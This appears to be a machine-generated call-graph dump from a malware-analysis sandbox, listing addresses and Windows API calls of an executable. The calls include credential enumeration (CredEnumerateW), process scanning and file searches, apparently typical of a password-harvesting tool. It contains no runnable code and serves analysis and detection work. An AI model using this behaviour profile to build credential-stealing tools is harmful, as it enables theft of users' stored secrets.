37728->37737 37731->37722 37732 41eb85 11 API calls 37732->37725 37734 41ee70 37733->37734 37735 41ee78 37733->37735 37793 41bf99 86 API calls 37734->37793 37735->37722 37738 41be5f 37737->37738 37740 41be6f 37737->37740 37772 4446ce 11 API calls 37738->37772 37744 41be8c 37740->37744 37758 418c63 37740->37758 37741 41be69 37741->37722 37741->37732 37744->37741 37745 41bf3a 37744->37745 37747 41bed1 37744->37747 37748 41bee7 37744->37748 37775 4446ce 11 API calls 37745->37775 37749 41bef0 37747->37749 37751 41bee2 37747->37751 37748->37741 37776 41a453 86 API calls 37748->37776 37749->37748 37750 41bf01 37749->37750 37752 41bf24 memset 37750->37752 37754 41bf14 37750->37754 37773 418a6d memset memcpy memset 37750->37773 37762 41ac13 37751->37762 37752->37741 37774 41a223 memset memcpy memset 37754->37774 37757 41bf20 37757->37752 37760 418c72 37758->37760 37759 418c94 37759->37744 37760->37759 37761 418d51 memset memset 37760->37761 37761->37759 37763 41ac52 37762->37763 37764 41ac3f memset 37762->37764 37766 41ac6a 37763->37766 37777 41dc14 19 API calls 37763->37777 37769 41acd9 37764->37769 37767 41aca1 37766->37767 37778 41519d 37766->37778 37767->37769 37770 41acc0 memset 37767->37770 37771 41accd memcpy 37767->37771 37769->37748 37770->37769 37771->37769 37772->37741 37773->37754 37774->37757 37775->37748 37777->37766 37781 4175ed 37778->37781 37789 417570 SetFilePointer 37781->37789 37784 41760a ReadFile 37785 417637 37784->37785 37786 417627 GetLastError 37784->37786 37787 4151b3 37785->37787 37788 41763e memset 37785->37788 37786->37787 37787->37767 37788->37787 37790 41759c GetLastError 37789->37790 37792 4175b2 37789->37792 37791 4175a8 GetLastError 37790->37791 37790->37792 37791->37792 37792->37784 37792->37787 37793->37735 37794 417bc5 37795 417c61 37794->37795 37796 417bda 37794->37796 37796->37795 37797 417bf6 UnmapViewOfFile CloseHandle 37796->37797 37800 417c2c 37796->37800 37801 4175b7 37796->37801 37797->37796 37797->37797 37800->37796 37806 41851e 20 API calls 37800->37806 37802 4175d6 CloseHandle 37801->37802 37803 4175c8 37802->37803 37804 4175df 37802->37804 37803->37804 37805 4175ce Sleep 37803->37805 37804->37796 37805->37802 37806->37800 37807 4152c7 malloc 37808 4152ef 37807->37808 37810 4152e2 37807->37810 37811 416760 11 API calls 37808->37811 37811->37810 37812 415308 free 37813 41276d 37814 41277d 37813->37814 37856 4044a4 LoadLibraryW 37814->37856 37816 412785 37817 412789 37816->37817 37864 414b81 37816->37864 37820 4127c8 37870 412465 memset ??2@YAPAXI 37820->37870 37822 4127ea 37882 40ac21 37822->37882 37827 412813 37900 40dd07 memset 37827->37900 37828 412827 37905 40db69 memset 37828->37905 37831 412822 37926 4125b6 ??3@YAXPAX 37831->37926 37833 40ada2 _wcsicmp 37835 41283d 37833->37835 37835->37831 37838 412863 CoInitialize 37835->37838 37910 41268e 37835->37910 37930 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37838->37930 37840 41296f 37932 40b633 37840->37932 37842 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37848 412957 CoUninitialize 37842->37848 37853 4128ca 37842->37853 37848->37831 37849 4128d0 TranslateAcceleratorW 37850 412941 GetMessageW 37849->37850 37849->37853 37850->37848 37850->37849 37851 412909 IsDialogMessageW 37851->37850 37851->37853 37852 4128fd IsDialogMessageW 37852->37850 37852->37851 37853->37849 37853->37851 37853->37852 37854 41292b TranslateMessage DispatchMessageW 37853->37854 37855 41291f IsDialogMessageW 37853->37855 37854->37850 37855->37850 37855->37854 37857 4044cf GetProcAddress 37856->37857 37861 4044f7 37856->37861 37858 4044e8 FreeLibrary 37857->37858 37859 4044df 37857->37859 37860 4044f3 37858->37860 37858->37861 37859->37858 37860->37861 37862 404507 MessageBoxW 37861->37862 37863 40451e 37861->37863 37862->37816 37863->37816 37865 414b8a 37864->37865 37866 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37864->37866 37936 40a804 memset 37865->37936 37866->37820 37869 414b9e GetProcAddress 37869->37866 37871 4124e0 37870->37871 37872 412505 ??2@YAPAXI 37871->37872 37873 41251c 37872->37873 37878 412521 37872->37878 37958 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37873->37958 37947 444722 37878->37947 37881 41259b wcscpy 37881->37822 37963 40b1ab free free 37882->37963 37884 40ad76 37964 40aa04 37884->37964 37887 40a9ce malloc memcpy free free 37890 40ac5c 37887->37890 37888 40ad4b 37888->37884 37987 40a9ce 37888->37987 37890->37884 37890->37887 37890->37888 37891 40ace7 free 37890->37891 37967 40a8d0 37890->37967 37979 4099f4 37890->37979 37891->37890 37895 40a8d0 7 API calls 37895->37884 37896 40ada2 37897 40adaa 37896->37897 37898 40adc9 37896->37898 37897->37898 37899 40adb3 _wcsicmp 37897->37899 37898->37827 37898->37828 37899->37897 37899->37898 37992 40dce0 37900->37992 37902 40dd3a GetModuleHandleW 37997 40dba7 37902->37997 37906 40dce0 3 API calls 37905->37906 37907 40db99 37906->37907 38069 40dae1 37907->38069 38083 402f3a 37910->38083 37912 412766 37912->37831 37912->37838 37913 4126d3 _wcsicmp 37914 4126a8 37913->37914 37914->37912 37914->37913 37916 41270a 37914->37916 38117 4125f8 7 API calls 37914->38117 37916->37912 38086 411ac5 37916->38086 37927 4125da 37926->37927 37928 4125f0 37927->37928 37929 4125e6 DeleteObject 37927->37929 37931 40b1ab free free 37928->37931 37929->37928 37930->37842 37931->37840 37933 40b640 37932->37933 37934 40b639 free 37932->37934 37935 40b1ab free free 37933->37935 37934->37933 37935->37817 37937 40a83b GetSystemDirectoryW 37936->37937 37938 40a84c wcscpy 37936->37938 37937->37938 37943 409719 wcslen 37938->37943 37941 40a881 LoadLibraryW 37942 40a886 37941->37942 37942->37866 37942->37869 37944 409724 37943->37944 37945 409739 wcscat LoadLibraryW 37943->37945 37944->37945 37946 40972c wcscat 37944->37946 37945->37941 37945->37942 37946->37945 37948 444732 37947->37948 37949 444728 DeleteObject 37947->37949 37959 409cc3 37948->37959 37949->37948 37951 412551 37952 4010f9 37951->37952 37953 401130 37952->37953 37954 401134 GetModuleHandleW LoadIconW 37953->37954 37955 401107 wcsncat 37953->37955 37956 40a7be 37954->37956 37955->37953 37957 40a7d2 37956->37957 37957->37881 37957->37957 37958->37878 37962 409bfd memset wcscpy 37959->37962 37961 409cdb CreateFontIndirectW 37961->37951 37962->37961 37963->37890 37965 40aa14 37964->37965 37966 40aa0a free 37964->37966 37965->37896 37966->37965 37968 40a8eb 37967->37968 37969 40a8df wcslen 37967->37969 37970 40a906 free 37968->37970 37971 40a90f 37968->37971 37969->37968 37972 40a919 37970->37972 37973 4099f4 3 API calls 37971->37973 37974 40a932 37972->37974 37975 40a929 free 37972->37975 37973->37972 37977 4099f4 3 API calls 37974->37977 37976 40a93e memcpy 37975->37976 37976->37890 37978 40a93d 37977->37978 37978->37976 37980 409a41 37979->37980 37981 4099fb malloc 37979->37981 37980->37890 37983 409a37 37981->37983 37984 409a1c 37981->37984 37983->37890 37985 409a30 free 37984->37985 37986 409a20 memcpy 37984->37986 37985->37983 37986->37985 37988 40a9e7 37987->37988 37989 40a9dc free 37987->37989 37991 4099f4 3 API calls 37988->37991 37990 40a9f2 37989->37990 37990->37895 37991->37990 38016 409bca GetModuleFileNameW 37992->38016 37994 40dce6 wcsrchr 37995 40dcf5 37994->37995 37996 40dcf9 wcscat 37994->37996 37995->37996 37996->37902 38017 44db70 37997->38017 38001 40dbfd 38020 4447d9 38001->38020 38004 40dc34 wcscpy wcscpy 38046 40d6f5 38004->38046 38005 40dc1f wcscpy 38005->38004 38008 40d6f5 3 API calls 38009 40dc73 38008->38009 38010 40d6f5 3 API calls 38009->38010 38011 40dc89 38010->38011 38012 40d6f5 3 API calls 38011->38012 38013 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38012->38013 38052 40da80 38013->38052 38016->37994 38018 40dbb4 memset memset 38017->38018 38019 409bca GetModuleFileNameW 38018->38019 38019->38001 38021 4447f4 38020->38021 38022 40dc1b 38021->38022 38023 444807 ??2@YAPAXI 38021->38023 38022->38004 38022->38005 38024 44481f 38023->38024 38025 444873 _snwprintf 38024->38025 38026 4448ab wcscpy 38024->38026 38059 44474a 8 API calls 38025->38059 38028 4448bb 38026->38028 38060 44474a 8 API calls 38028->38060 38029 4448a7 38029->38026 38029->38028 38031 4448cd 38061 44474a 8 API calls 38031->38061 38033 4448e2 38062 44474a 8 API calls 38033->38062 38035 4448f7 38063 44474a 8 API calls 38035->38063 38037 44490c 38064 44474a 8 API calls 38037->38064 38039 444921 38065 44474a 8 API calls 38039->38065 38041 444936 38066 44474a 8 API calls 38041->38066 38043 44494b 38067 44474a 8 API calls 38043->38067 38045 444960 ??3@YAXPAX 38045->38022 38047 44db70 38046->38047 38048 40d702 memset GetPrivateProfileStringW 38047->38048 38049 40d752 38048->38049 38050 40d75c WritePrivateProfileStringW 38048->38050 38049->38050 38051 40d758 38049->38051 38050->38051 38051->38008 38053 44db70 38052->38053 38054 40da8d memset 38053->38054 38055 40daac LoadStringW 38054->38055 38056 40dac6 38055->38056 38056->38055 38058 40dade 38056->38058 38068 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38056->38068 38058->37831 38059->38029 38060->38031 38061->38033 38062->38035 38063->38037 38064->38039 38065->38041 38066->38043 38067->38045 38068->38056 38079 409b98 GetFileAttributesW 38069->38079 38071 40daea 38072 40daef wcscpy wcscpy GetPrivateProfileIntW 38071->38072 38078 40db63 38071->38078 38080 40d65d GetPrivateProfileStringW 38072->38080 38074 40db3e 38081 40d65d GetPrivateProfileStringW 38074->38081 38076 40db4f 38082 40d65d GetPrivateProfileStringW 38076->38082 38078->37833 38079->38071 38080->38074 38081->38076 38082->38078 38118 40eaff 38083->38118 38087 411ae2 memset 38086->38087 38088 411b8f 38086->38088 38158 409bca GetModuleFileNameW 38087->38158 38100 411a8b 38088->38100 38090 411b0a wcsrchr 38091 411b22 wcscat 38090->38091 38092 411b1f 38090->38092 38159 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38091->38159 38092->38091 38094 411b67 38160 402afb 38094->38160 38098 411b7f 38216 40ea13 SendMessageW memset SendMessageW 38098->38216 38101 402afb 27 API calls 38100->38101 38102 411ac0 38101->38102 38103 4110dc 38102->38103 38104 41113e 38103->38104 38109 4110f0 38103->38109 38241 40969c LoadCursorW SetCursor 38104->38241 38106 411143 38242 444a54 38106->38242 38245 4032b4 38106->38245 38107 4110f7 _wcsicmp 38107->38109 38108 411157 38110 40ada2 _wcsicmp 38108->38110 38109->38104 38109->38107 38263 410c46 10 API calls 38109->38263 38113 411167 38110->38113 38111 4111af 38113->38111 38114 4111a6 qsort 38113->38114 38114->38111 38117->37914 38119 40eb10 38118->38119 38131 40e8e0 38119->38131 38122 40eb6c memcpy memcpy 38123 40ebb7 38122->38123 38123->38122 38124 40d134 16 API calls 38123->38124 38125 40ebf2 ??2@YAPAXI ??2@YAPAXI 38123->38125 38124->38123 38126 40ec2e ??2@YAPAXI 38125->38126 38128 40ec65 38125->38128 38126->38128 38141 40ea7f 38128->38141 38130 402f49 38130->37914 38132 40e8f2 38131->38132 38133 40e8eb ??3@YAXPAX 38131->38133 38134 40e900 38132->38134 38135 40e8f9 ??3@YAXPAX 38132->38135 38133->38132 38136 40e911 38134->38136 38137 40e90a ??3@YAXPAX 38134->38137 38135->38134 38138 40e931 ??2@YAPAXI ??2@YAPAXI 38136->38138 38139 40e921 ??3@YAXPAX 38136->38139 38140 40e92a ??3@YAXPAX 38136->38140 38137->38136 38138->38122 38139->38140 38140->38138 38142 40aa04 free 38141->38142 38143 40ea88 38142->38143 38144 40aa04 free 38143->38144 38145 40ea90 38144->38145 38146 40aa04 free 38145->38146 38147 40ea98 38146->38147 38148 40aa04 free 38147->38148 38149 40eaa0 38148->38149 38150 40a9ce 4 API calls 38149->38150 38151 40eab3 38150->38151 38152 40a9ce 4 API calls 38151->38152 38153 40eabd 38152->38153 38154 40a9ce 4 API calls 38153->38154 38155 40eac7 38154->38155 38156 40a9ce 4 API calls 38155->38156 38157 40ead1 38156->38157 38157->38130 38158->38090 38159->38094 38217 40b2cc 38160->38217 38162 402b0a 38163 40b2cc 27 API calls 38162->38163 38164 402b23 38163->38164 38165 40b2cc 27 API calls 38164->38165 38166 402b3a 38165->38166 38167 40b2cc 27 API calls 38166->38167 38168 402b54 38167->38168 38169 40b2cc 27 API calls 38168->38169 38170 402b6b 38169->38170 38171 40b2cc 27 API calls 38170->38171 38172 402b82 38171->38172 38173 40b2cc 27 API calls 38172->38173 38174 402b99 38173->38174 38175 40b2cc 27 API calls 38174->38175 38176 402bb0 38175->38176 38177 40b2cc 27 API calls 38176->38177 38178 402bc7 38177->38178 38179 40b2cc 27 API calls 38178->38179 38180 402bde 38179->38180 38181 40b2cc 27 API calls 38180->38181 38182 402bf5 38181->38182 38183 40b2cc 27 API calls 38182->38183 38184 402c0c 38183->38184 38185 40b2cc 27 API calls 38184->38185 38186 402c23 38185->38186 38187 40b2cc 27 API calls 38186->38187 38188 402c3a 38187->38188 38189 40b2cc 27 API calls 38188->38189 38190 402c51 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402c68 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402c7f 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402c99 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402cb3 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402cd5 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402cf0 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402d0b 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402d26 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402d3e 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402d59 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402d78 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402d93 38213->38214 38215 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38214->38215 38215->38098 38216->38088 38220 40b58d 38217->38220 38219 40b2d1 38219->38162 38221 40b5a4 GetModuleHandleW FindResourceW 38220->38221 38222 40b62e 38220->38222 38223 40b5c2 LoadResource 38221->38223 38225 40b5e7 38221->38225 38222->38219 38224 40b5d0 SizeofResource LockResource 38223->38224 38223->38225 38224->38225 38225->38222 38233 40afcf 38225->38233 38227 40b608 memcpy 38236 40b4d3 memcpy 38227->38236 38229 40b61e 38237 40b3c1 18 API calls 38229->38237 38231 40b626 38238 40b04b 38231->38238 38234 40b04b ??3@YAXPAX 38233->38234 38235 40afd7 ??2@YAPAXI 38234->38235 38235->38227 38236->38229 38237->38231 38239 40b051 ??3@YAXPAX 38238->38239 38240 40b05f 38238->38240 38239->38240 38240->38222 38241->38106 38243 444a64 FreeLibrary 38242->38243 38244 444a83 38242->38244 38243->38244 38244->38108 38246 4032c4 38245->38246 38247 40b633 free 38246->38247 38248 403316 38247->38248 38264 44553b 38248->38264 38252 403480 38462 40368c 15 API calls 38252->38462 38254 403489 38255 40b633 free 38254->38255 38257 403495 38255->38257 38256 40333c 38256->38252 38258 4033a9 memset memcpy 38256->38258 38259 4033ec wcscmp 38256->38259 38460 4028e7 11 API calls 38256->38460 38461 40f508 6 API calls 38256->38461 38257->38108 38258->38256 38258->38259 38259->38256 38262 403421 _wcsicmp 38262->38256 38263->38109 38265 445548 38264->38265 38266 445599 38265->38266 38463 40c768 38265->38463 38267 4455a8 memset 38266->38267 38275 4457f2 38266->38275 38546 403988 38267->38546 38273 4455e5 38285 445672 38273->38285 38291 44560f 38273->38291 38278 445854 38275->38278 38648 403e2d memset memset memset memset memset 38275->38648 38276 4458bb memset memset 38282 414c2e 17 API calls 38276->38282 38329 4458aa 38278->38329 38671 403c9c memset memset memset memset memset 38278->38671 38279 44557a 38326 44558c 38279->38326 38744 4136c0 CoTaskMemFree 38279->38744 38281 44595e memset memset 38288 414c2e 17 API calls 38281->38288 38283 4458f9 38282->38283 38289 40b2cc 27 API calls 38283->38289 38557 403fbe memset memset memset memset memset 38285->38557 38286 445a00 memset memset 38694 414c2e 38286->38694 38287 445b22 38293 445bca 38287->38293 38294 445b38 memset memset memset 38287->38294 38298 44599c 38288->38298 38299 445909 38289->38299 38303 4087b3 338 API calls 38291->38303 38292 445849 38760 40b1ab free free 38292->38760 38300 445c8b memset memset 38293->38300 38368 445cf0 38293->38368 38304 445bd4 38294->38304 38305 445b98 38294->38305 38308 40b2cc 27 API calls 38298->38308 38309 409d1f 6 API calls 38299->38309 38313 414c2e 17 API calls 38300->38313 38301 445585 38745 41366b FreeLibrary 38301->38745 38302 44589f 38761 40b1ab free free 38302->38761 38310 445621 38303->38310 38319 414c2e 17 API calls 38304->38319 38305->38304 38315 445ba2 38305->38315 38312 4459ac 38308->38312 38323 445919 38309->38323 38746 4454bf 20 API calls 38310->38746 38311 445823 38311->38292 38334 4087b3 338 API calls 38311->38334 38324 409d1f 6 API calls 38312->38324 38325 445cc9 38313->38325 38833 4099c6 wcslen 38315->38833 38316 4456b2 38748 40b1ab free free 38316->38748 38318 40b2cc 27 API calls 38330 445a4f 38318->38330 38332 445be2 38319->38332 38320 403335 38459 4452e5 45 API calls 38320->38459 38321 445d3d 38352 40b2cc 27 API calls 38321->38352 38322 445d88 memset memset memset 38335 414c2e 17 API calls 38322->38335 38762 409b98 GetFileAttributesW 38323->38762 38336 4459bc 38324->38336 38337 409d1f 6 API calls 38325->38337 38530 444b06 38326->38530 38327 445879 38327->38302 38348 4087b3 338 API calls 38327->38348 38329->38276 38353 44594a 38329->38353 38710 409d1f wcslen wcslen 38330->38710 38341 40b2cc 27 API calls 38332->38341 38334->38311 38345 445dde 38335->38345 38829 409b98 GetFileAttributesW 38336->38829 38347 445ce1 38337->38347 38338 445bb3 38836 445403 memset 38338->38836 38339 445680 38339->38316 38580 4087b3 memset 38339->38580 38342 445bf3 38341->38342 38351 409d1f 6 API calls 38342->38351 38343 445928 38343->38353 38763 40b6ef 38343->38763 38354 40b2cc 27 API calls 38345->38354 38853 409b98 GetFileAttributesW 38347->38853 38348->38327 38362 445c07 38351->38362 38363 445d54 _wcsicmp 38352->38363 38353->38281 38367 4459ed 38353->38367 38366 445def 38354->38366 38355 4459cb 38355->38367 38376 40b6ef 253 API calls 38355->38376 38359 40b2cc 27 API calls 38360 445a94 38359->38360 38715 40ae18 38360->38715 38361 44566d 38361->38275 38631 413d4c 38361->38631 38372 445389 259 API calls 38362->38372 38373 445d71 38363->38373 38438 445d67 38363->38438 38365 445665 38747 40b1ab free free 38365->38747 38374 409d1f 6 API calls 38366->38374 38367->38286 38367->38287 38368->38320 38368->38321 38368->38322 38369 445389 259 API calls 38369->38293 38378 445c17 38372->38378 38854 445093 23 API calls 38373->38854 38381 445e03 38374->38381 38376->38367 38377 4456d8 38383 40b2cc 27 API calls 38377->38383 38384 40b2cc 27 API calls 38378->38384 38380 44563c 38380->38365 38386 4087b3 338 API calls 38380->38386 38855 409b98 GetFileAttributesW 38381->38855 38382 40b6ef 253 API calls 38382->38320 38388 4456e2 38383->38388 38389 445c23 38384->38389 38385 445d83 38385->38320 38386->38380 38749 413fa6 _wcsicmp _wcsicmp 38388->38749 38393 409d1f 6 API calls 38389->38393 38391 445e12 38398 445e6b 38391->38398 38404 40b2cc 27 API calls 38391->38404 38396 445c37 38393->38396 38394 445aa1 38397 445b17 38394->38397 38412 445ab2 memset 38394->38412 38425 409d1f 6 API calls 38394->38425 38722 40add4 38394->38722 38727 445389 38394->38727 38736 40ae51 38394->38736 38395 4456eb 38400 4456fd memset memset memset memset 38395->38400 38401 4457ea 38395->38401 38402 445389 259 API calls 38396->38402 38830 40aebe 38397->38830 38857 445093 23 API calls 38398->38857 38750 409c70 wcscpy wcsrchr 38400->38750 38753 413d29 38401->38753 38407 445c47 38402->38407 38408 445e33 38404->38408 38414 40b2cc 27 API calls 38407->38414 38415 409d1f 6 API calls 38408->38415 38410 445e7e 38411 445f67 38410->38411 38420 40b2cc 27 API calls 38411->38420 38416 40b2cc 27 API calls 38412->38416 38418 445c53 38414->38418 38419 445e47 38415->38419 38416->38394 38417 409c70 2 API calls 38421 44577e 38417->38421 38422 409d1f 6 API calls 38418->38422 38856 409b98 GetFileAttributesW 38419->38856 38424 445f73 38420->38424 38426 409c70 2 API calls 38421->38426 38427 445c67 38422->38427 38429 409d1f 6 API calls 38424->38429 38425->38394 38430 44578d 38426->38430 38431 445389 259 API calls 38427->38431 38428 445e56 38428->38398 38434 445e83 memset 38428->38434 38432 445f87 38429->38432 38430->38401 38437 40b2cc 27 API calls 38430->38437 38431->38293 38860 409b98 GetFileAttributesW 38432->38860 38436 40b2cc 27 API calls 38434->38436 38439 445eab 38436->38439 38440 4457a8 38437->38440 38438->38320 38438->38382 38441 409d1f 6 API calls 38439->38441 38442 409d1f 6 API calls 38440->38442 38443 445ebf 38441->38443 38444 4457b8 38442->38444 38445 40ae18 9 API calls 38443->38445 38752 409b98 GetFileAttributesW 38444->38752 38455 445ef5 38445->38455 38447 4457c7 38447->38401 38449 4087b3 338 API calls 38447->38449 38448 40ae51 9 API calls 38448->38455 38449->38401 38450 445f5c 38452 40aebe FindClose 38450->38452 38451 40add4 2 API calls 38451->38455 38452->38411 38453 40b2cc 27 API calls 38453->38455 38454 409d1f 6 API calls 38454->38455 38455->38448 38455->38450 38455->38451 38455->38453 38455->38454 38457 445f3a 38455->38457 38858 409b98 GetFileAttributesW 38455->38858 38859 445093 23 API calls 38457->38859 38459->38256 38460->38262 38461->38256 38462->38254 38464 40c775 38463->38464 38861 40b1ab free free 38464->38861 38466 40c788 38862 40b1ab free free 38466->38862 38468 40c790 38863 40b1ab free free 38468->38863 38470 40c798 38471 40aa04 free 38470->38471 38472 40c7a0 38471->38472 38864 40c274 memset 38472->38864 38477 40a8ab 9 API calls 38478 40c7c3 38477->38478 38479 40a8ab 9 API calls 38478->38479 38480 40c7d0 38479->38480 38893 40c3c3 38480->38893 38484 40c877 38493 40bdb0 38484->38493 38485 40c86c 38935 4053fe 39 API calls 38485->38935 38491 40c7e5 38491->38484 38491->38485 38492 40c634 50 API calls 38491->38492 38918 40a706 38491->38918 38492->38491 39198 404363 38493->39198 38496 40bf5d 39218 40440c 38496->39218 38497 40bdee 38497->38496 38501 40b2cc 27 API calls 38497->38501 38498 40bddf CredEnumerateW 38498->38497 38502 40be02 wcslen 38501->38502 38502->38496 38507 40be1e 38502->38507 38503 40be26 wcsncmp 38503->38507 38506 40be7d memset 38506->38507 38508 40bea7 memcpy 38506->38508 38507->38496 38507->38503 38507->38506 38507->38508 38509 40bf11 wcschr 38507->38509 38510 40b2cc 27 API calls 38507->38510 38512 40bf43 LocalFree 38507->38512 39221 40bd5d 28 API calls 38507->39221 39222 404423 38507->39222 38508->38507 38508->38509 38509->38507 38511 40bef6 _wcsnicmp 38510->38511 38511->38507 38511->38509 38512->38507 38513 4135f7 39237 4135e0 38513->39237 38516 40b2cc 27 API calls 38517 41360d 38516->38517 38518 40a804 8 API calls 38517->38518 38519 413613 38518->38519 38520 41361b 38519->38520 38521 41363e 38519->38521 38522 40b273 27 API calls 38520->38522 38523 4135e0 FreeLibrary 38521->38523 38524 413625 GetProcAddress 38522->38524 38525 413643 38523->38525 38524->38521 38526 413648 38524->38526 38525->38279 38527 413658 38526->38527 38528 4135e0 FreeLibrary 38526->38528 38527->38279 38529 413666 38528->38529 38529->38279 39240 4449b9 38530->39240 38533 444c1f 38533->38266 38534 4449b9 42 API calls 38536 444b4b 38534->38536 38535 444c15 38538 4449b9 42 API calls 38535->38538 38536->38535 39261 444972 GetVersionExW 38536->39261 38538->38533 38539 444b99 memcmp 38544 444b8c 38539->38544 38540 444c0b 39265 444a85 42 API calls 38540->39265 38544->38539 38544->38540 39262 444aa5 42 API calls 38544->39262 39263 40a7a0 GetVersionExW 38544->39263 39264 444a85 42 API calls 38544->39264 38547 40399d 38546->38547 39266 403a16 38547->39266 38549 403a09 39280 40b1ab free free 38549->39280 38551 403a12 wcsrchr 38551->38273 38552 4039a3 38552->38549 38555 4039f4 38552->38555 39277 40a02c CreateFileW 38552->39277 38555->38549 38556 4099c6 2 API calls 38555->38556 38556->38549 38558 414c2e 17 API calls 38557->38558 38559 404048 38558->38559 38560 414c2e 17 API calls 38559->38560 38561 404056 38560->38561 38562 409d1f 6 API calls 38561->38562 38563 404073 38562->38563 38564 409d1f 6 API calls 38563->38564 38565 40408e 38564->38565 38566 409d1f 6 API calls 38565->38566 38567 4040a6 38566->38567 38568 403af5 20 API calls 38567->38568 38569 4040ba 38568->38569 38570 403af5 20 API calls 38569->38570 38571 4040cb 38570->38571 39307 40414f memset 38571->39307 38573 404140 39321 40b1ab free free 38573->39321 38575 4040ec memset 38578 4040e0 38575->38578 38576 404148 38576->38339 38577 4099c6 2 API calls 38577->38578 38578->38573 38578->38575 38578->38577 38579 40a8ab 9 API calls 38578->38579 38579->38578 39334 40a6e6 WideCharToMultiByte 38580->39334 38582 4087ed 39335 4095d9 memset 38582->39335 38585 408809 memset memset memset memset memset 38586 40b2cc 27 API calls 38585->38586 38587 4088a1 38586->38587 38588 409d1f 6 API calls 38587->38588 38589 4088b1 38588->38589 38590 40b2cc 27 API calls 38589->38590 38591 4088c0 38590->38591 38592 409d1f 6 API calls 38591->38592 38593 4088d0 38592->38593 38594 40b2cc 27 API calls 38593->38594 38595 4088df 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 4088ef 38596->38597 38598 40b2cc 27 API calls 38597->38598 38599 4088fe 38598->38599 38600 409d1f 6 API calls 38599->38600 38612 408953 38612->38339 38632 40b633 free 38631->38632 38633 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38632->38633 38634 413f00 Process32NextW 38633->38634 38635 413da5 OpenProcess 38634->38635 38636 413f17 CloseHandle 38634->38636 38637 413eb0 38635->38637 38638 413df3 memset 38635->38638 38636->38377 38637->38634 38640 413ebf free 38637->38640 38641 4099f4 3 API calls 38637->38641 39778 413f27 38638->39778 38640->38637 38641->38637 38642 413e37 GetModuleHandleW 38644 413e46 GetProcAddress 38642->38644 38645 413e1f 38642->38645 38644->38645 38645->38642 39783 413959 38645->39783 39799 413ca4 38645->39799 38647 413ea2 CloseHandle 38647->38637 38649 414c2e 17 API calls 38648->38649 38650 403eb7 38649->38650 38651 414c2e 17 API calls 38650->38651 38652 403ec5 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 403ee2 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 403efd 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 403f15 38657->38658 38659 403af5 20 API calls 38658->38659 38660 403f29 38659->38660 38661 403af5 20 API calls 38660->38661 38662 403f3a 38661->38662 38663 40414f 33 API calls 38662->38663 38669 403f4f 38663->38669 38664 403faf 39813 40b1ab free free 38664->39813 38666 403f5b memset 38666->38669 38667 403fb7 38667->38311 38668 4099c6 2 API calls 38668->38669 38669->38664 38669->38666 38669->38668 38670 40a8ab 9 API calls 38669->38670 38670->38669 38672 414c2e 17 API calls 38671->38672 38673 403d26 38672->38673 38674 414c2e 17 API calls 38673->38674 38675 403d34 38674->38675 38676 409d1f 6 API calls 38675->38676 38677 403d51 38676->38677 38678 409d1f 6 API calls 38677->38678 38679 403d6c 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 403d84 38680->38681 38682 403af5 20 API calls 38681->38682 38683 403d98 38682->38683 38684 403af5 20 API calls 38683->38684 38685 403da9 38684->38685 38686 40414f 33 API calls 38685->38686 38687 403dbe 38686->38687 38688 403e1e 38687->38688 38690 403dca memset 38687->38690 38692 4099c6 2 API calls 38687->38692 38693 40a8ab 9 API calls 38687->38693 39814 40b1ab free free 38688->39814 38690->38687 38691 403e26 38691->38327 38692->38687 38693->38687 38695 414b81 9 API calls 38694->38695 38696 414c40 38695->38696 38697 414c73 memset 38696->38697 39815 409cea 38696->39815 38699 414c94 38697->38699 39818 414592 RegOpenKeyExW 38699->39818 38702 414c64 SHGetSpecialFolderPathW 38704 414d0b 38702->38704 38703 414cc1 38705 414cf4 wcscpy 38703->38705 39819 414bb0 wcscpy 38703->39819 38704->38318 38705->38704 38707 414cd2 39820 4145ac RegQueryValueExW 38707->39820 38709 414ce9 RegCloseKey 38709->38705 38711 409d62 38710->38711 38712 409d43 wcscpy 38710->38712 38711->38359 38713 409719 2 API calls 38712->38713 38714 409d51 wcscat 38713->38714 38714->38711 38716 40aebe FindClose 38715->38716 38717 40ae21 38716->38717 38718 4099c6 2 API calls 38717->38718 38719 40ae35 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 40ae49 38720->38721 38721->38394 38723 40ade0 38722->38723 38724 40ae0f 38722->38724 38723->38724 38725 40ade7 wcscmp 38723->38725 38724->38394 38725->38724 38726 40adfe wcscmp 38725->38726 38726->38724 38728 40ae18 9 API calls 38727->38728 38729 4453c4 38728->38729 38730 40ae51 9 API calls 38729->38730 38731 4453f3 38729->38731 38732 40add4 2 API calls 38729->38732 38735 445403 254 API calls 38729->38735 38730->38729 38733 40aebe FindClose 38731->38733 38732->38729 38734 4453fe 38733->38734 38734->38394 38735->38729 38737 40ae7b FindNextFileW 38736->38737 38738 40ae5c FindFirstFileW 38736->38738 38739 40ae94 38737->38739 38740 40ae8f 38737->38740 38738->38739 38742 40aeb6 38739->38742 38743 409d1f 6 API calls 38739->38743 38741 40aebe FindClose 38740->38741 38741->38739 38742->38394 38743->38742 38744->38301 38745->38326 38746->38380 38747->38361 38748->38361 38749->38395 38751 409c89 38750->38751 38751->38417 38752->38447 38754 413d39 